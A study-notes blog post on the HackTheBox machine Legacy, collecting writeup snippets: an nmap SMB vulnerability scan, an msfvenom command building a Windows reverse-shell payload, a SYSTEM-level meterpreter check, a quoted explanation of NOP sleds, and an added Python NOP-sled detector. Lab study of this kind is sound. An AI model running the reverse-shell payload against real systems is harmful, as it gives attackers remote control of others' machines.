Working through HackTheBox, part 23: notes on useful-looking approaches from the Legacy writeups

This time it's the machine Legacy.
Once again I'm going through writeups.


【HackTheBox】Legacy - Walkthrough - - Qiita
Checking the Windows user

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


Legacy | Hackthebox OSCP series | Spenge's Cybersecurity Blog
OSCP-style compromise without using MSF

After finding the SMB ports, run a vulnerability scan with nmap

nmap --script smb-vuln* -p 139,445 10.10.10.14

Creating a payload that does not use meterpreter (msfvenom)

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode

NOPS?
Check this later

But we may not forget the comment in the exploit telling us the decoder needs enough NOPS at the beginning for the decoder to work!

→ Found an explanation of NOPS
Reference:
shellcode - NOPS in Metasploit - Information Security Stack Exchange

In assembly code, NOP is short for No OPeration. This is most popularly known for x86 chips as 0x90. When a processor loads that instruction, it simply does nothing (at least useful) for the one cycle and then advances the register to the next instruction.

NOPs keep the payload sizes consistent

... by ensuring that any space not used by other code will still be validly executable by the processor with no side effects. This "NOP sled" is also the source of humorous names like DEFCON 19 CTF winners European Nopsled Team.

The practical importance of this has to do with writing instruction jumps. Jumps can either be of a relative jump (read the memory 8 bytes before where you are now) or of an absolute jump (read the memory located at position 0x874710). If you move data around at all with an absolute jump, you must recode any references to it. If you move one instruction around relative to another, you must also recode the relative jumps. Putting NOPs in simplifies the problem because a jump that lands anywhere in a series of NOPs will continue on to the first executable instruction and prevent the processor from reading an invalid code that would stop execution and crash the software.

Most prevalently, if you know the pointer for the stack will point somewhere in a continuous range of memory addresses, you'd fill that with NOPs and then put your code after.

Check out this shellcode writing tutorial that explains when it makes use of NOPs to gain better understanding.

→ So, does that mean it's something that includes do-nothing instructions to adjust the payload length? Is that right????
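Looking at the same idea from the defender's side: a long run of 0x90 bytes in inbound traffic is the classic NOP-sled signature that IDS rules look for. The following is an added example (not code from the post or the quoted answer) with a constructed sample buffer; the NOP-equivalent byte set and the run-length threshold are my own assumptions.

```python
# Added example: heuristic NOP-sled detection of the kind an IDS applies.
# Constructed sample data; the threshold and NOP-equivalent set are assumptions.

X86_NOP = 0x90                       # single-byte x86 NOP, as the quoted answer says


def nop_sled_runs(data: bytes, min_len: int = 16, nop_bytes=frozenset({X86_NOP})):
    """Return (offset, length) for every run of NOP-equivalent bytes of at least min_len.

    Only runs reaching min_len are reported, so the odd 0x90 inside normal data
    (where it is a perfectly legal instruction or just a byte value) is ignored.
    Encoders that replace the sled with other one-byte instructions evade a
    0x90-only check, which is why nop_bytes can be widened by the caller.
    """
    runs = []
    i, n = 0, len(data)
    while i < n:
        if data[i] in nop_bytes:
            start = i
            while i < n and data[i] in nop_bytes:
                i += 1
            if i - start >= min_len:
                runs.append((start, i - start))
        else:
            i += 1
    return runs


def looks_like_sled(data: bytes, min_len: int = 16) -> bool:
    """True when the buffer contains at least one sled-length NOP run."""
    return bool(nop_sled_runs(data, min_len))


# Constructed samples: a 32-byte sled followed by six placeholder bytes,
# and a short buffer that contains scattered NOPs but no sled-length run.
SAMPLE_SLED = b"\x90" * 32 + b"\xcc" * 6
SAMPLE_CLEAN = b"\x41\x42\x90\x43\x90\x90\x44"

if __name__ == "__main__":
    print(nop_sled_runs(SAMPLE_SLED))    # [(0, 32)]
    print(nop_sled_runs(SAMPLE_CLEAN))   # []
    print(looks_like_sled(SAMPLE_SLED))  # True
```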

Plenty of takeaways again this time!

That's all.